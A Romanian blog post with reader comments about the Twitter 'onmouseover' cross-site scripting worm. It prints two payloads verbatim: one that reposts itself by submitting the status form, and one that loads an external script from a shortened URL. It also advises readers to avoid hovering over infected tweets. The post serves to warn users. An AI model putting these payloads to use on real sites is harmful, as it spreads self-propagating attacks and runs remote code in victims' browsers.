Azi, de vreo 15 minute au început să apară pe Twitter tot felul de mesaje care conțin același cod HTML și JavaScript. Ele vin de la utilizatorii care folosesc Twitter direct de pe twitter.com și conțin un script ascuns, care dă tweet-uri mai departe către urmăritorii lor.
Exploit-ul 1:
scriptul: http://a.no/@”onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit()” style=”color:#000;background:#000;/
Exploit-ul 2:
scriptul: http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7’)”/
Sfaturi pentru eliminare:
1. Nu mai trece cu mouse-ul peste tweet-urile infectate! Da, ălea negre și textele uriașe
2. Folosește un client desktop de Twitter în loc de Twitter.com
Recomand Tweetdeck
Update: cică Twitter ar fi rezolvat problema(cel puțin la nivel de avertizare)
Update 2: Mashable.com a descoperit și alte tipuri de scripturi – un pop-up, de exemplu. Nici TheNextWeb nu se lasă mai prejos – aici, un overlayer gri și niște mesaje de eroare
Ma distreaza cat de greu se prinde lumea…
…sau poate o fac intentionat deja ca sa se distreze :))
sfatul #1 e genial 😐 “tare” ghidul 🙂
…pana se prinde lumea ne ducem de rapa..
un alt client desktop bun: hootsuite
cat de maniac tre sa fii ca sa te distreze tweeturile goale si negre?
e la mintea cocosului sa scapam de prostia asta
dar cauza o stie cineva?
probabil ca vreun hackeras